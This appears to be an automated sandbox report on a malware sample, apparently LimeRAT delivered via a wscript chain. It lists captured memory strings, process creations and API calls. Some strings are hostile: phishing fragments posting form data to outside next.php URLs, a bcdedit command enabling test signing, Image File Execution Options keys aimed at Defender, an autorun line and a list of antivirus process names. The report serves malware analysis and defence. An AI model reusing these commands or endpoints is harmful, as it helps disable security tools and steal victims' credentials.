Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: <k<zf
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: <>wg
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .z+an3:e!y
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: he731
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: k! g@
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: k%a+!*
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 1;>sc;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 53b ca
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: --7?v
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e<s7d
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: o;<e7
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cw<c5?u
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: )!gr]q
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dmns0
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 2]o\j 6e
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: mp+zyd
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 5ig-o
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 8cb58
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: u~ju;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ?ho5l
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: fh~ek
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: }k"~b{gf&
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: =7]:`<[
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: n")[1].replace("debug-->","")))
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:codeonly.viewsure.j
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g.length;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +=1){
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ]=newarray((0x1000-0x20)/4);
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ][0]=0x666;
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:html/phish.av23!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: url:'https://stretchbuilder.com/chalkzone/next.php',type:'post',data:
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: gurl:'https://stretchbuilder.com/chalkzone/next.php',type:'post',data:
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:html/phish.pdh8!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: url:'https://izmirdentalimplant.net/wp-content/themes/neve/next.php',
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: gurl:'https://izmirdentalimplant.net/wp-content/themes/neve/next.php',
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "target="https://vr2oq.csb.app/"targetmode="external

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582E0C4 AllocateAndInitializeSid,FreeSid,

45_2_00007FF7B582E0C4

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError,

45_2_00007FF7B582F884

Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :\|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp, MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp, MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: Progman Folder*Administrative Tools
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: ieinstal.exe, 0000000D.00000002.19674952257.000000001E8D5000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582418C cpuid

45_2_00007FF7B582418C

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57DF3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId,

45_2_00007FF7B57DF3E8

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582D874 RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError,

45_2_00007FF7B582D874

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

Code function: 37_2_00007FF7202E8ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

37_2_00007FF7202E8ED4

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

May enable test signing (to load unsigned drivers)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp

Memory string: bcdedit.exe -set TESTSIGNING ON

Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp

Binary or memory string: S:(ML;;NRNWNX;;;LW)]

Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: \startup\360tray.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: kav32.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kavsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	Binary or memory string: procdump.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: \360tray.exe
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: \virus.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: KAVPFW.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: pctsGui.exe
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kpfwsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: RavmonD.exe
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: CCenter.exe
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: KWatch.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: KvXP.kxp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kpfw32.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Binary or memory string: *.csv.\|!\SBAMSvc.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: nod32.exe
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: kav.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kvsrvxp.exe
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: \360safe.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	Binary or memory string: savservice.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: DefWatch.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: regshot.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: bdagent.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: kavstart.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: KavPFW.EXE
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.manifest.\|!\SavService.exe
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: SPIDERNT.EXE
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp	Binary or memory string: msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: ICESWORD.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	Binary or memory string: AyAgent.aye
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: bdss.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AVP.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: IceSword.exe
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: kvxp.kxp
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: acs.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 360safe.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: RavTask.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: KAV32.exe
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	Binary or memory string: \procdump.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Binary or memory string: *.jpg.\|!\SavService.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: avgnt.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	Binary or memory string: \vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: a2guard.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: mbam.exe
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp	Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: avktray.exe
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, mpam-77b29277.exe	Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	Binary or memory string: "\vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: cmdagent.exe
